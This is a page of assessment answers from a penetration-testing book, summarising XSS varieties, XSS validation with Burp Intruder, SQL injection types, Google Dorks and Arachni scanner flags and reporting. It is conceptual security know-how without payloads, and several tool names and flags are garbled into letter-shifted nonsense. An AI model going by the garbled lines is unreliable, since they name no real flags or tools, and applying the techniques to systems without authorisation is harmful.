Page 226 - Hands-On Bug Hunting for Penetration Testers
P. 226
Assessment
Chapter 4
1. Stored/Persistent, Reflected, and DOM Based XSS are three common varieties of
XSS.
2. Persistent XSS is particularly dangerous because the malicious code stored in the
server can be served up to a large number of users.
3. There are a lot of false positives associated with XSS discovery. XSS Validator
helps boost the signal through the noise.
4. The XSS Validator QIBOUPNKT server listens for possible vulnerabilities and
performs validation checks on them.
5. Use the Payload Positions feature in the Payloads tab in Burp Intruder.
6. All of the usual contextual data is important (URL location, input, and so on), but
the payload is most essential.
7. An XSS vulnerability could allow an attacker to steal admin account credentials
and take the actions of a superuser for a particular service and organization.
8. Including an attack scenario convinces the team receiving the report that they
should expend the necessary resources to fix the bug (and trigger your reward).
Chapter 5
1. Blind SQLi is SQLi where the results aren't visible; error-based SQLi expose
sensitive information via carefully crafted SQL errors and time-based SQLi.
2. Aggressive SQLi injections can potentially damage a database or application.
3. Google Dorks are search queries designed to expose potentially vulnerable sites.
The term comes from the hapless employee who mistakenly allows a sensitive
document to be indexed by a public search engine.
4. UJNFPVU, DIFDLT, TDPQF JODMVEF TVCEPNBJOT, IUUQ SFRVFTU
DPODVSSFODZ ."9@$0/$633&/$:, and QMVHJO
1-6(*/ 015*0/ 7"-6& 015*0/ 7"-6& are all useful configuration flags
for the BSBDIOJ CLI.
5. You can generate reports from BGS files using the BSBDIOJ@SFQPSUFS CLI:
arachni_reporter some_report.afr --
reporter=html:outfile=my_report.html.zip
[ 211 ]
